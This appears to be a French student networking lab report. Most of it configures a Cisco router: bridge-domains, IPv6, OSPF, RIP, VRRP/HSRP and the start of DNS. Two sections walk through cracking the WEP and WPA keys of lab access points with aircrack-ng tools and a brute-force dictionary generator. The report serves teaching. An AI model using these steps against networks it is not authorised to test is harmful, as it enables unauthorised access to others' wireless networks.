Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 4e séance====&lt;br /&gt;
=====Test 1=====&lt;br /&gt;
Cette semaine, nous avons testés la configuration locale de notre routeur. Nous avons donc tentés de ping le routeur depuis notre VM. &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour tester, nous avons besoin d'un port disponible sur CORDOUAN qui est dans le bridge IMA5sc.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après des essais laborieux, nous décidons donc de regarder les adresses MAC des ports afin de les rassembler. Si 4 ports ont le même radical MAC, c'est qu'ils font partis d'un groupe de 4. Nous avons donc choisis '''eth4'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, il fallait trouver le port physique correspondant a eth4. '''Grâce au fichier /etc/udev/rules.d/70-persistence-net.rules''', on peut voir l'association du port physique à l'interface. Voici l'extrait qui nous intéresse: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;# PCI device 0x14e4:0x1657 (tg3)&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:40&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth4&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:41&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth5&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:42&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth6&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:43&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth7&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On voit bien que eth4 est dans un groupe de 4 ports, ce qui restreint nos choix. Ensuite, on sait que c'est le plus petit des 4 interfaces. Logiquement, ce sera le 1er du groupe.&amp;lt;br /&amp;gt;&lt;br /&gt;
On connecte donc ce port au commutateur sur un port qui appartient au VLAN des VM. On connecte ensuite notre routeur au commutateur via un port trunk.&amp;lt;br /&amp;gt;&lt;br /&gt;
'''Premier essai: FAIL'''&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Test 2=====&lt;br /&gt;
Et là, c'est le drame ... On ne ping rien ...&amp;lt;br /&amp;gt;&lt;br /&gt;
On se demande donc d'où cela peut venir.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Première cause possible : La configuration de CORDOUAN======&lt;br /&gt;
Peut-être que c'est CORDOUAN qui est mal configuré. On se place donc sur CORDOUAN, et grâce à la commande '''cdpr''' (Cisco Discovery Protocol Reporter), on peut demander au serveur de chercher ses voisins et d'avoir la configuration de la liaison avec ce voisin. Voici le résultat de cette commande:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cdpr -d eth4&lt;br /&gt;
cdpr - Cisco Discovery Protocol Reporter&lt;br /&gt;
Version 2.4&lt;br /&gt;
Copyright (c) 2002-2010 - MonkeyMental.com&lt;br /&gt;
&lt;br /&gt;
Using Device: eth4&lt;br /&gt;
Warning opening device (eth4: no IPv4 address assigned)&lt;br /&gt;
Waiting for CDP advertisement:&lt;br /&gt;
(default config is to transmit CDP packets every 60 seconds)&lt;br /&gt;
Device ID&lt;br /&gt;
  value:  Switch_E306&lt;br /&gt;
Addresses&lt;br /&gt;
Port ID&lt;br /&gt;
  value:  GigabitEthernet4/13&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien que CORDOUAN détecte qu'il a une liaison avec le switch qui se trouve en E306 et qu'il est connecté via le port Gi4/13.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Deuxième cause possible: Le commutateur======&lt;br /&gt;
Peut-être donc que c'est le commutateur qui est mal configuré. On se place donc sur le commutateur, et toujours grâce à la commande '''cdpr''', on peut demander au commutateur de trouver ses voisins. Le résultat de cette commande est la suivante: Le commutateur découvre bien notre routeur (cisco), et sait qu'il est connecté sur le port 4/47 (port trunk).&lt;br /&gt;
======Dernière cause possible:Le routeur======&lt;br /&gt;
On se dit donc que le problème vient du routeur...&amp;lt;br /&amp;gt;&lt;br /&gt;
On regarde donc la configuration du routeur, et Mr REDON nous demande pourquoi on n'a pas créé de VLAN. Les VLAN sont traduits par les service instance dans le nouvel IOS, mais peut-être que nous devons encore définir que les paquets venant/sortant de l'interface générale doivent être encapsulé/décapsulé en DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après quelques recherches, une première solution a été de préciser sur l'interface des bridge-domain que les paquets étaient encapsulés en DOT1Q. Solution '''peu logique''' vu que l'encapsulation est déjà faite dans les service instance.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après encore quelques recherches, une solution plausible est que '''le routeur ne sait pas qu'il faut dé-encapsuler les paquets venant d'un VLAN'''. Théoriquement, il n'enlèverait pas le tag associé à l'encapsulation DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une commande cisco à associer à TOUTES les interfaces service instance permet de préciser qu'il faut supprimer le tag associé à l'encapsulation:&lt;br /&gt;
&amp;lt;pre&amp;gt;rewrite ingress tag pop 1 symmetric&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois cette commande appliquée à tous les services, nous pouvons effectuer un test préalable : '''Nous connectons un eeePC au commutateur via un port associé au VLAN des VM. L'eeePC serait muni d'une IP dans le réseau des VM.'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Résultat '''OK'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc tenter de ping le routeur depuis la machine virtuelle :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ping 193.48.57.171&lt;br /&gt;
PING 193.48.57.171 (193.48.57.171) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=1 ttl=255 time=0.360 ms&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=2 ttl=255 time=0.271 ms&lt;br /&gt;
^C&lt;br /&gt;
--- 193.48.57.171 ping statistics ---&lt;br /&gt;
2 packets transmitted, 2 received, 0% packet loss, time 999ms&lt;br /&gt;
rtt min/avg/max/mdev = 0.271/0.315/0.360/0.047 ms&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre configuration locale est donc maintenant achevée. Nous pouvons passer à la configuration de l'interconnexion ipv4 et ipv6 de l'école.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 5e séance====&lt;br /&gt;
=====Configuration IPv6=====&lt;br /&gt;
Nous avons donc pu commencer la configuration IPv6 de notre routeur.&amp;lt;br /&amp;gt;&lt;br /&gt;
Chaque bridge-domain aura son adresse IP dans le réseau IPv6 de l'école, avec un préfixe débutant à 2001:660:4401:60b0::/64.&amp;lt;br /&amp;gt;&lt;br /&gt;
La configuration est la suivante, pour chaque BDI:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco(config)#int BDI6                                                          &lt;br /&gt;
cisco(config-if)#ipv6 address 2001:660:4401:60b4::/64 eui-64                    &lt;br /&gt;
cisco(config-if)#ipv6 nd prefix 2001:660:4401:60b4::/64 1000 900                &lt;br /&gt;
cisco(config-if)#ipv6 nd router-preference high                                 &lt;br /&gt;
cisco(config-if)#ipv6 enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration OSPF (IPv4)=====&lt;br /&gt;
Dès notre arrivée, Mr.REDON nous a dit que, pour booster le TP, il avait effectué lui-même la configuration OSPF de notre routeur. La voici:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;router ospf 1&lt;br /&gt;
 router-id 10.60.2.1&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0&lt;br /&gt;
 summary-address 193.48.57.160 255.255.255.240&lt;br /&gt;
 redistribute connected metric 30 subnets&lt;br /&gt;
 network 192.168.222.0 0.0.0.7 area 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration RIP (IPv6)=====&lt;br /&gt;
Le protocole RIPv6 est une stratégie de routage pour IPv6. Ce protocole est configuré pour le BDI130 (correspondant au VLAN130 d'interconnexion des routeurs de l'école). La configuration de RIP est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ipv6 router rip tpima5sc&lt;br /&gt;
 redistribute connected metric 1&lt;br /&gt;
 redistribute static metric 1&lt;br /&gt;
 redistribute rip 1 metric 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
La prise en compte du protocole RIP dans la BDI130 est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI130&lt;br /&gt;
 ip address 192.168.222.1 255.255.255.248&lt;br /&gt;
 ipv6 address 2001:660:4401:60AA::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60AA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 ipv6 rip tpima5sc enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pour confirmer notre résultat, nous regardons la table de routage IPv6:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; cisco#sh ipv6 route&lt;br /&gt;
IPv6 Routing Table - default - 65 entries&lt;br /&gt;
Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
       B - BGP, R - RIP, I1 - ISIS L1, I2 - ISIS L2&lt;br /&gt;
       IA - ISIS interarea, IS - ISIS summary, D - EIGRP, EX - EIGRP external&lt;br /&gt;
       ND - ND Default, NDp - ND Prefix, DCE - Destination, NDr - Redirect&lt;br /&gt;
       O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
       ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2, a - Application&lt;br /&gt;
R   ::/0 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre routeur détecte les routeurs de l'école, notre configuration est donc achevée.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration VRRP=====&lt;br /&gt;
Le VRRP est un protocole de redondance. Une adresse IP virtuelle (IP flottante) est montée sur 1 des 2 routeurs. Si le routeur sur laquelle est montée l'IP flottante tombe, l'IP est montée sur l'autre routeur. De plus, les machines pourront envoyer les paquets vers l'adresse IP virtuelle, et le VRRP dispatchera les paquets entre les 2 routeurs.&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration VRRP de notre routeur:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI2&lt;br /&gt;
 ip address 10.60.2.1 255.255.255.0&lt;br /&gt;
 ipv6 address 2001:660:4401:60B0::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60B0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 vrrp 1 ip 10.60.2.3&lt;br /&gt;
 vrrp 1 priority 110&amp;lt;/pre&amp;gt;&lt;br /&gt;
10.60.X.1 est l'espace des adresses IP de notre routeur (4331), 10.60.X.2 est l'espace des adresses IP du routeur 3560E, donc 10.60.X.3 est l'espace des adresses IP flottantes, X représente le numéro du BDI.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons voir si notre configuration VRRP est effective : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco#sh vrrp&lt;br /&gt;
BDI12 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 193.48.57.173&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 193.48.57.171 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&lt;br /&gt;
BDI2 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 10.60.2.1 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cependant, même si notre configuration VRRP est bonne, nous n'arrivons pas à ping 193.48.57.173, qui représente l'adresse IP virtuelle montée sur le bridge-domain des VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Craquage de clé WEP=====&lt;br /&gt;
On bascule d’abord la carte en mode monitor : &lt;br /&gt;
&amp;lt;pre&amp;gt; airmon-ng start xxxxxxxx  &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite on scan tous les réseaux wifi captés par cette même carte :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –encrypt wep wlan 0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient :&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
 CH 13 ][ Elapsed: 4 s ][ 2016-03-08 10:32                                         &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 44:AD:D9:5F:87:00  -44        2        0    0  11  54e. WEP  WEP         Wolverine                               &lt;br /&gt;
 04:DA:D2:9C:50:53  -66        2        0    0  13  54e. WEP  WEP         cracotte04                              &lt;br /&gt;
 04:DA:D2:9C:50:55  -70        2       91   35  13  54e. WEP  WEP         cracotte06                              &lt;br /&gt;
 04:DA:D2:9C:50:51  -69        4       33   13  13  54e. WEP  WEP         cracotte02                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -67        3       44   19  13  54e. WEP  WEP         cracotte08                              &lt;br /&gt;
 04:DA:D2:9C:50:56  -69        2       38   11  13  54e. WEP  WEP         cracotte07                              &lt;br /&gt;
 04:DA:D2:9C:50:54  -68        2       37   14  13  54e. WEP  WEP         cracotte05                              &lt;br /&gt;
 04:DA:D2:9C:50:58  -70        2      175   70  13  54e. WEP  WEP         cracotte09                              &lt;br /&gt;
 04:DA:D2:9C:50:50  -68        0      142   52  13  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -70        2      171   64  13  54e. WEP  WEP         cracotte03                              &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                         &lt;br /&gt;
                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 - 9e  1160       50                                                &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -62    0 -48e    34        7                                                &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -64    0 - 6e    31        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -66    0 -48e    60        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -70    0 -24e    52       11                                                &lt;br /&gt;
 04:DA:D2:9C:50:58  00:0F:B5:92:23:69  -62    0 -48e    12      140  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ici nous avons choisi cracotte06 comme wifi cible. On récupère donc son BSSID : 04 :DA :D2 :9C :50 :55 sur le channel 13&amp;lt;br /&amp;gt;&lt;br /&gt;
On surveille uniquement notre cible pour s'assurer qu'une machine s'y connecte bien :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –w out –c 13 –bssid 04 :DA :D2 :9C :50 :55 wlan0 &amp;lt;/pre&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour le craquage, il faut au préalable surchargé de requête ARP le réseau cible pour récupérer un maximum de trame d’échanges.&lt;br /&gt;
&amp;lt;pre&amp;gt; aireplay-ng -3 –e cracotte06 –a 04 :DA :D2 :9C :50 :55 –b 04 :DA :D2 :9C :50 :55 –h 00:0F:B5:92:23:6B –x 1000 –n out-ox.cap wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois un nombre de trame récupéré assez conséquent, on lance l’utilitaire : &amp;lt;pre&amp;gt;aircarck-ng out_ox.cap&amp;lt;/pre&amp;gt; avec out_ox.cap le fichier de sauvegarde contenant toutes les trames ARP récupérées. &lt;br /&gt;
&lt;br /&gt;
On a alors réussi notre craquage au bout de quelque minutes :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:01] Tested 785 keys (got 1349085 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  2   EE(1862400) 75(1396736) DB(1392128) FF(1388544) 50(1387520) &lt;br /&gt;
    1    1/  4   DD(1419264) 1B(1397504) 2C(1392128) 54(1387776) 26(1385728) &lt;br /&gt;
    2   47/  2   DB(1365760) 38(1364736) 00(1364480) 22(1364480) 82(1364480) &lt;br /&gt;
    3    1/  2   26(1407488) 2C(1390592) 65(1387520) F0(1387520) FE(1387520) &lt;br /&gt;
    4    4/  4   F6(1383168) CD(1382656) 7E(1381376) F0(1380096) 58(1379840) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 6e séance (additionnel) ====&lt;br /&gt;
=====Configuration HSRP=====&lt;br /&gt;
Le VRRP n'était pas compatible sur le routeur du groupe 6 (3560E) à cause de la trop faible version de 'IOS Cisco. Du coup, il nous a été demandé de mettre en place le protocole en dessous de VRRP, HSRP.&amp;lt;br /&amp;gt;&lt;br /&gt;
Le protocole HSRP fonctionne comme le VRRP, et s'implémente, par BDI, comme suit:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Sstandby 1 ip 10.60.X.3&lt;br /&gt;
standby 1 preempt&lt;br /&gt;
standby 1 priority 100&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il fallait aussi que notre routeur soit connecté au 2e commutateur via une liaison fibre en mode trunk. Ainsi, nous pouvons voir, dans ce qui suit, que le routeur maitre est le routeur 3560E, et que nous sommes en standby !&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;BDI2 - Group 1 (version 2)&lt;br /&gt;
  State is Standby&lt;br /&gt;
    7 state changes, last state change 00:01:16&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Active virtual MAC address is 0000.0c9f.f001 (MAC Not In Use)&lt;br /&gt;
    Local virtual MAC address is 0000.0c9f.f001 (v2 default)&lt;br /&gt;
  Hello time 3 sec, hold time 10 sec&lt;br /&gt;
    Next hello sent in 0.128 secs&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Active router is 10.60.2.2, priority 110 (expires in 8.784 sec)&lt;br /&gt;
    MAC address is d4d7.4842.53c1&lt;br /&gt;
  Standby router is local&lt;br /&gt;
  Priority 100 (default 100)&lt;br /&gt;
  Group name is &amp;quot;Vlan2&amp;quot; (cfgd)&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Craquage clé WPA =====&lt;br /&gt;
&lt;br /&gt;
Pour ce craquage, nous avons gardé la même cible, c'est à dire cracotte06. Il faut encore ici s'assurer qu'une machine est connecté à cette borne.&lt;br /&gt;
Pour le craquage WPA, il nous faut 2 éléments : &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un fichier d'échange contenant le handshake &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un dictionnaire contenant toutes les possibilités de valeur que peut avoir la clé.  &lt;br /&gt;
&lt;br /&gt;
Ici nous avons simplement récupéré le handshake grâce à la commande d'écoute de la borne :&lt;br /&gt;
&amp;lt;pre&amp;gt;  airodump-ng -w out --encrypt wpa -c 13 --04 :DA :D2 :9C :50 :55  wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Grâce à l'option -w out, il nous a créée un fichier stockant le hanshake. &lt;br /&gt;
&lt;br /&gt;
En parallèle nous avons généré le fichier txt jouant le rôle de dictionnaire, à l'aide d'un programme C. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
	FILE *fp=fopen(&amp;quot;dico.txt&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
	int i =0;&lt;br /&gt;
	for(i=0;i&amp;lt;=99999999;i++){&lt;br /&gt;
		fprintf(fp,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
	}&lt;br /&gt;
	return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Finalement on utilise l'utilitaire aircrack avec en paramètre le fichier de sauvegarde contenant le handshake ainsi que le fichier texte dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;  aircrack-ng -w dico.txt dump-02.cap &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient avec succès au bout de quelque minutes : &lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:47] 12399904 keys tested (3519.77 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399907 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : F5 4A 19 53 7C DB 88 D1 D0 21 3B FD FF 5F EF CD &lt;br /&gt;
                       D0 DE 05 F5 0F DB 08 79 85 16 17 8B E0 E4 6B 23 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 25 94 12 1B 71 2C 49 01 10 44 34 8A 8A 74 36 47 &lt;br /&gt;
                       7B 1C D8 3D 77 A5 9B 9D 74 44 DC C7 5F 55 D7 0B &lt;br /&gt;
                       2B 29 83 CC FC 08 7E DF BF A6 B7 76 AF BA D5 8A &lt;br /&gt;
                       07 F0 61 B1 02 3A 56 B2 A2 03 CD 80 20 14 3E D8 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : CF 04 96 3D DC 43 B4 D1 0E D5 0F B5 78 2F 57 C9 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration DNS=====&lt;br /&gt;
Dans un premier temps, nous réservons sur Gandi notre nom de domaine : speedflash.space&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous installons les paquets bind9, ainsi que apache2.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous configurons les fichiers nécessaires à la bonne marche du serveur DNS à savoir les fichiers named.conf.local (autorisation de transfert de paquets vers le DNS esclave - Utilisation du bon fichier de zone), puis db.speedflash.space (fichier de zone)&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration de ces 2 fichiers :&amp;lt;br /&amp;gt;&lt;br /&gt;
named.conf.local :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;quot;speedflash.space&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
